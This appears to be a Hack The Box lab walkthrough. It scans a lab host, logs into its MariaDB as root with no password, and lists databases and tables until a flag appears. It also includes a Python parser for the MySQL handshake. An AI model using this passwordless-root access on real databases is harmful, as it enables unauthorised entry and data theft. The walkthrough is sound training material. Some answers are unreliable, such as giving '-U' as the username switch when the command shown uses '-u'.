During our scan, which port do we find serving MySQL?
3306
┌─[us-starting-point-vip-1-dhcp]─[10.10.14.28]─[leewookb@htb-0x7zvm1bat]─[~]
└──╼ [★]$ nmap -sC -sV 10.129.50.55 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-11 23:56 CDT
Nmap scan report for 10.129.50.55
Host is up (0.0084s latency).
Not shown: 65534 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
3306/tcp open  mysql?
| mysql-info:
|   Protocol: 10
|   Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
|   Thread ID: 66
|   Capabilities flags: 63486
|   Some Capabilities: Speaks41ProtocolOld, Support41Auth, SupportsTransactions, SupportsCompression, IgnoreSigpipes, IgnoreSpaceBeforeParenthesis, InteractiveClient, Speaks41ProtocolNew, ConnectWithDatabase, FoundRows, SupportsLoadDataLocal, ODBCClient, DontAllowDatabaseTableColumn, LongColumnFlag, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
|   Status: Autocommit
|   Salt: 6'\|}}|xdny7D0ay_OOz
|_  Auth Plugin Name: mysql_native_password

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 204.84 seconds
What community-developed MySQL version is the target running?
MariaDB
| mysql-info:
|   Protocol: 10
|   Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
|   Thread ID: 66
|   Capabilities flags: 63486
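The mysql-info fields above are read from the greeting packet the server sends before any login takes place. As an added example (not part of the original write-up), this Python parser decodes that HandshakeV10 greeting and strips the 5.5.5- prefix that MariaDB 10.x puts in front of its real version; the sample packet is constructed from the nmap values above, with the character set and upper capability bits assumed.

```python
import struct

CLIENT_SECURE_CONNECTION = 1 << 15   # server sends a second scramble part
CLIENT_PLUGIN_AUTH = 1 << 19         # server names its auth plugin
# thread id, salt part 1, filler, caps low, charset, status, caps high, salt length
FIXED = "<I8sxHBHHB"

def parse_handshake_v10(packet: bytes) -> dict:
    """Parse a MySQL/MariaDB initial handshake (4-byte header + HandshakeV10)."""
    length = int.from_bytes(packet[:3], "little")
    body = packet[4:4 + length]
    if len(packet) < 4 or len(body) != length or length < 1:
        raise ValueError("truncated packet")
    if body[0] != 10:  # 0xff here is an ERR packet, e.g. client host not allowed
        raise ValueError(f"not a HandshakeV10 greeting (first byte {body[0]:#04x})")
    end = body.index(b"\x00", 1)                   # version is NUL-terminated
    raw_version = body[1:end].decode("ascii", "replace")
    try:
        thread_id, salt, caps_lo, _charset, status, caps_hi, salt_len = \
            struct.unpack_from(FIXED, body, end + 1)
    except struct.error as exc:
        raise ValueError("truncated handshake") from exc
    pos = end + 1 + struct.calcsize(FIXED) + 10    # skip 10 reserved bytes
    caps, plugin = caps_lo | (caps_hi << 16), None
    if caps & CLIENT_SECURE_CONNECTION:
        n = max(13, salt_len - 8)                  # part 2 ends with a NUL
        salt += body[pos:pos + n - 1]
        pos += n
    if caps & CLIENT_PLUGIN_AUTH:
        plugin = body[pos:].split(b"\x00", 1)[0].decode("ascii", "replace")
    # MariaDB 10.x prepends "5.5.5-" for old replication clients; strip it.
    is_mariadb = "MariaDB" in raw_version
    version = raw_version[6:] if is_mariadb and raw_version.startswith("5.5.5-") else raw_version
    return {"raw_version": raw_version, "version": version,
            "is_mariadb": is_mariadb, "thread_id": thread_id,
            "caps_low": caps_lo, "autocommit": bool(status & 0x0002),
            "salt": salt, "auth_plugin": plugin}

def build_sample() -> bytes:
    """Constructed greeting: nmap fields from the page, charset and upper caps assumed."""
    salt = b"6'\\|}}|xdny7D0ay_OOz"
    body = (b"\x0a" + b"5.5.5-10.3.27-MariaDB-0+deb10u1\x00"
            + struct.pack("<I", 66) + salt[:8] + b"\x00"
            + struct.pack("<HBHHB", 63486, 0x2D, 0x0002, 0x000B, 21)
            + bytes(10) + salt[8:] + b"\x00" + b"mysql_native_password\x00")
    return len(body).to_bytes(3, "little") + b"\x00" + body

if __name__ == "__main__":
    for key, value in parse_handshake_v10(build_sample()).items():
        print(f"{key:12} {value}")
```

Because all of this is sent to any client that can reach port 3306, the version and auth plugin are visible to an unauthenticated scanner.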
When using the MySQL command line client, what switch do we need to use in order to specify a login username?
-U
The option can be found with the mysql --help command.
Which username allows us to log into this MariaDB instance without providing a password?
root
I attempted to log in as root without a password and it was accepted.
mysql -h {target IP address} -u {username}
┌─[us-starting-point-vip-1-dhcp]─[10.10.14.28]─[leewookb@htb-0x7zvm1bat]─[~]
└──╼ [★]$ mysql -h 10.129.50.55 -u root
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 74
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>
In SQL, what symbol can we use to specify within the query that we want to display everything inside a table?
*
The asterisk symbol (*) is used to display everything (all columns) inside a table.
For example, SELECT * FROM {table_name}
In SQL, what symbol do we need to end each query with?
;
In SQL, we specify ; (the semicolon) to end each query, just like we end every line with the semicolon when programming in JavaScript.
There are three databases in this MySQL instance that are common across all MySQL instances. What is the name of the fourth that’s unique to this host?
htb
The SHOW DATABASES command listed all the databases in the MySQL instance, and htb is the one unique to this host.
MariaDB [(none)]> SHOW DATABASES;
+--------------------+
| Database           |
+--------------------+
| htb                |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
Submit root flag
7b4bec00d1a39e3dd4e021ec3d915da8
Since I know the database that I'm interested in is the htb database, I ran the use htb command to change the database to htb.
Then I listed the tables belonging to the database with show tables.
MariaDB [(none)]> use htb
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [htb]> show tables;
+---------------+
| Tables_in_htb |
+---------------+
| config        |
| users         |
+---------------+
2 rows in set (0.009 sec)
To list everything in the config table, I ran show * from config and there was the flag.
MariaDB [htb]> select * from config;
+----+-----------------------+----------------------------------+
| id | name                  | value                            |
+----+-----------------------+----------------------------------+
|  1 | timeout               | 60s                              |
|  2 | security              | default                          |
|  3 | auto_logon            | false                            |
|  4 | max_size              | 2M                               |
|  5 | flag                  | 7b4bec00d1a39e3dd4e021ec3d915da8 |
|  6 | enable_uploads        | false                            |
|  7 | authentication_method | radius                           |
+----+-----------------------+----------------------------------+
7 rows in set (0.009 sec)